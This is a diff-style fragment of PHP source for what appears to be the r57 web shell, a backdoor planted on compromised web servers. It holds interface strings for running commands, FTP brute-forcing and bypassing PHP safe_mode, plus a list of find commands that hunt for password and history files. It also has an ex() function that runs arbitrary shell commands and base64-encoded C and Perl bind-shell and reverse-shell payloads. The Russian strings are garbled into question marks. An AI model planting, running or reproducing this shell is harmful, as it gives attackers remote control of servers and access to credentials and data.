+'ru_text38'=>'??????',
+'ru_text39'=>'????',
+'ru_text40'=>'???? ??????? ???? ??????',
+'ru_butt9' =>'????',
+'ru_text41'=>'????????? ? ?????',
+'ru_text42'=>'?????????????? ?????',
+'ru_text43'=>'????????????? ????',
+'ru_butt10'=>'?????????',
+'ru_butt11'=>'?????????????',
+'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',
+'ru_text45'=>'???? ????????',
+'ru_text46'=>'???????? phpinfo()',
+'ru_text47'=>'???????? ???????? php.ini',
+'ru_text48'=>'???????? ????????? ??????',
+'ru_text49'=>'???????? ??????? ? ???????',
+'ru_text50'=>'?????????? ? ??????????',
+'ru_text51'=>'?????????? ? ??????',
+'ru_text52'=>'????? ??? ??????',
+'ru_text53'=>'?????? ? ?????',
+'ru_text54'=>'????? ?????? ? ??????',
+'ru_butt12'=>'?????',
+'ru_text55'=>'?????? ? ??????',
+'ru_text56'=>'?????? ?? ???????',
+'ru_text57'=>'???????/??????? ????/??????????',
+'ru_text58'=>'???',
+'ru_text59'=>'????',
+'ru_text60'=>'??????????',
+'ru_butt13'=>'???????/???????',
+'ru_text61'=>'???? ??????',
+'ru_text62'=>'?????????? ???????',
+'ru_text63'=>'???? ??????',
+'ru_text64'=>'?????????? ???????',
+'ru_text65'=>'???????',
+'ru_text66'=>'???????',
+'ru_text67'=>'Chown/Chgrp/Chmod',
+'ru_text68'=>'???????',
+'ru_text69'=>'????????1',
+'ru_text70'=>'????????2',
+'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",
+'ru_text72'=>'????? ??? ??????',
+'ru_text73'=>'?????? ? ?????',
+'ru_text74'=>'?????? ? ??????',
+'ru_text75'=>'* ????? ???????????? ?????????? ?????????',
+'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',
+'ru_text80'=>'???',
+'ru_text81'=>'????',
+'ru_text82'=>'???? ??????',
+'ru_text83'=>'?????????? SQL ???????',
+'ru_text84'=>'SQL ??????',
+'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',
+'ru_text86'=>'?????????? ????? ? ???????',
+'ru_butt14'=>'???????',
+'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',
+'ru_text88'=>'FTP-??????:????',
+'ru_text89'=>'???? ?? ftp ???????',
+'ru_text90'=>'????? ????????',
+'ru_text91'=>'???????????? ?',
+'ru_text92'=>'??? ?????????',
+'ru_text93'=>'FTP',
+'ru_text94'=>'FTP-????????',
+'ru_text95'=>'?????? ?????????????',
+'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',
+'ru_text97'=>'????????? ??????????: ',
+'ru_text98'=>'??????? ???????????: ',
+'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',
+'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',
+'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',
+'ru_text102'=>'?????',
+'ru_text103'=>'???????? ??????',
+'ru_text104'=>'???????? ????? ?? ???????? ????',
+'ru_text105'=>'????',
+'ru_text106'=>'??',
+'ru_text107'=>'????',
+'ru_butt15'=>'?????????',
+'ru_text108'=>'????? ??????',
+'ru_text109'=>'????????',
+'ru_text110'=>'??????????',
+'ru_text111'=>'SQL-?????? : ????',
+'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',
+'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',
+'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',
+'ru_text115'=>'???????? ??????????? ?????? ??????????? safe_mode, ??????????? ?????? ? compress.zlib:// ? copy()',
+'ru_text116'=>'?????????? ????',
+'ru_text117'=>'?',
+'ru_text118'=>'???? ??????????',
+'ru_text119'=>'?? ??????? ??????????? ????',
+'ru_err0'=>'??????! ?? ???? ???????? ? ???? ',
+'ru_err1'=>'??????! ?? ???? ????????? ???? ',
+'ru_err2'=>'??????! ?? ??????? ??????? ',
+'ru_err3'=>'??????! ?? ??????? ???????????? ? ftp ???????',
+'ru_err4'=>'?????? ??????????? ?? ftp ???????',
+'ru_err5'=>'??????! ?? ??????? ???????? ?????????? ?? ftp ???????',
+'ru_err6'=>'??????! ?? ??????? ????????? ??????',
+'ru_err7'=>'?????? ??????????',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Executed command',
+'eng_text2' =>'Execute command on server',
+'eng_text3' =>'Run command',
+'eng_text4' =>'Work directory',
+'eng_text5' =>'Upload files on server',
+'eng_text6' =>'Local file',
+'eng_text7' =>'Aliases',
+'eng_text8' =>'Select alias',
+'eng_butt1' =>'Execute',
+'eng_butt2' =>'Upload',
+'eng_text9' =>'Bind port to /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Password for access',
+'eng_butt3' =>'Bind',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Connect',
+'eng_text15'=>'Upload files from remote server',
+'eng_text16'=>'With',
+'eng_text17'=>'Remote file',
+'eng_text18'=>'Local file',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Use',
+'eng_text21'=>'&nbsp;New name',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Local port',
+'eng_text24'=>'Remote host',
+'eng_text25'=>'Remote port',
+'eng_text26'=>'Use',
+'eng_butt5' =>'Run',
+'eng_text28'=>'Work in safe_mode',
+'eng_text29'=>'ACCESS DENIED',
+'eng_butt6' =>'Change',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Show',
+'eng_text31'=>'File not found',
+'eng_text32'=>'Eval PHP code',
+'eng_text33'=>'Test bypass open_basedir with cURL functions',
+'eng_butt8' =>'Test',
+'eng_text34'=>'Test bypass safe_mode with include function',
+'eng_text35'=>'Test bypass safe_mode with load file in mysql',
+'eng_text36'=>'Database . Table',
+'eng_text37'=>'Login',
+'eng_text38'=>'Password',
+'eng_text39'=>'Database',
+'eng_text40'=>'Dump database table',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'Save dump in file',
+'eng_text42'=>'Edit files',
+'eng_text43'=>'File for edit',
+'eng_butt10'=>'Save',
+'eng_text44'=>'Can\'t edit file! Only read access!',
+'eng_text45'=>'File saved',
+'eng_text46'=>'Show phpinfo()',
+'eng_text47'=>'Show variables from php.ini',
+'eng_text48'=>'Delete temp files',
+'eng_butt11'=>'Edit file',
+'eng_text49'=>'Delete script from server',
+'eng_text50'=>'View cpu info',
+'eng_text51'=>'View memory info',
+'eng_text52'=>'Find text',
+'eng_text53'=>'In dirs',
+'eng_text54'=>'Find text in files',
+'eng_butt12'=>'Find',
+'eng_text55'=>'Only in files',
+'eng_text56'=>'Nothing :(',
+'eng_text57'=>'Create/Delete File/Dir',
+'eng_text58'=>'name',
+'eng_text59'=>'file',
+'eng_text60'=>'dir',
+'eng_butt13'=>'Create/Delete',
+'eng_text61'=>'File created',
+'eng_text62'=>'Dir created',
+'eng_text63'=>'File deleted',
+'eng_text64'=>'Dir deleted',
+'eng_text65'=>'Create',
+'eng_text66'=>'Delete',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Command',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Text for find',
+'eng_text73'=>'Find in folder',
+'eng_text74'=>'Find in files',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Search text in files via find',
+'eng_text80'=>'Type',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'Run SQL query',
+'eng_text84'=>'SQL query',
+'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
+'eng_text86'=>'Download files from server',
+'eng_butt14'=>'Download',
+'eng_text87'=>'Download files from remote ftp-server',
+'eng_text88'=>'FTP-server:port',
+'eng_text89'=>'File on ftp',
+'eng_text90'=>'Transfer mode',
+'eng_text91'=>'Archivation',
+'eng_text92'=>'without archivation',
+'eng_text93'=>'FTP',
+'eng_text94'=>'FTP-bruteforce',
+'eng_text95'=>'Users list',
+'eng_text96'=>'Can\'t get users list',
+'eng_text97'=>'checked: ',
+'eng_text98'=>'success: ',
+'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
+'eng_text100'=>'Send file to remote ftp server',
+'eng_text101'=>'Use reverse (user -> resu) login for password',
+'eng_text102'=>'Mail',
+'eng_text103'=>'Send email',
+'eng_text104'=>'Send file to email',
+'eng_text105'=>'To',
+'eng_text106'=>'From',
+'eng_text107'=>'Subj',
+'eng_butt15'=>'Send',
+'eng_text108'=>'Mail',
+'eng_text109'=>'Hide',
+'eng_text110'=>'Show',
+'eng_text111'=>'SQL-Server : Port',
+'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
+'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
+'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
+'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
+'eng_text116'=>'Copy from',
+'eng_text117'=>'to',
+'eng_text118'=>'File copied',
+'eng_text119'=>'Cant copy file',
+'eng_err0'=>'Error! Can\'t write in file ',
+'eng_err1'=>'Error! Can\'t read file ',
+'eng_err2'=>'Error! Can\'t create ',
+'eng_err3'=>'Error! Can\'t connect to ftp',
+'eng_err4'=>'Error! Can\'t login on ftp server',
+'eng_err5'=>'Error! Can\'t change dir on ftp',
+'eng_err6'=>'Error! Can\'t sent mail',
+'eng_err7'=>'Mail send',
+);
+/*
+?????? ??????
+????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
+?? ?????? ???? ????????? ??? ???????? ???????.
+*/
+$aliases=array(
+'find suid files'=>'find / -type f -perm -04000 -ls',
+'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
+'find sgid files'=>'find / -type f -perm -02000 -ls',
+'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
+'find config.inc.php files'=>'find / -type f -name config.inc.php',
+'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
+'find config* files'=>'find / -type f -name "config*"',
+'find config* files in current dir'=>'find . -type f -name "config*"',
+'find all writable files'=>'find / -type f -perm -2 -ls',
+'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
+'find all writable directories'=>'find /  -type d -perm -2 -ls',
+'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
+'find all writable directories and files'=>'find / -perm -2 -ls',
+'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
+'find all service.pwd files'=>'find / -type f -name service.pwd',
+'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
+'find all .htpasswd files'=>'find / -type f -name .htpasswd',
+'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
+'find all .bash_history files'=>'find / -type f -name .bash_history',
+'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
+'find all .mysql_history files'=>'find / -type f -name .mysql_history',
+'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
+'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
+'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
+'list file attributes on a Linux second extended file system'=>'lsattr -va',
+'show opened ports'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=Webdings color=gray>4</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if(isset($_GET['users'])) 
+ { 
+ if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
+ else 
+  { 
+  echo '<center>';
+  foreach($users as $user) { echo $user."<br>"; }
+  echo '</center>';
+  }
+ echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); 
+ }
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
+if(empty($dir))
+ { 
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); } 
+ if(empty($os)){ $os ="-"; $unix=1; } 
+ else
+    {
+    if(@eregi("^win",$os)) { $unix = 0; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
+  die(); 
+  }                                                          
+if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function get_users()
+{
+  $users = array();
+  $rows=file('/etc/passwd');
+  if(!$rows) return 0;	
+  foreach ($rows as $string)
+   {
+   	$user = @explode(":",$string);
+   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
+   }
+  return $users; 	
+}
+function err($n,$txt='')
+{
+echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';	
+echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
+if(!empty($txt)) { echo " $txt"; }
+echo '</b></div></font></td></tr></table>';
+return null;
+}
+function perms($mode)
+{
+if (!$GLOBALS['unix']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value,$checked=0)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\"";
+ if($checked) $ret .= " checked";
+ return $ret.">";
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or err(0);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }	
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
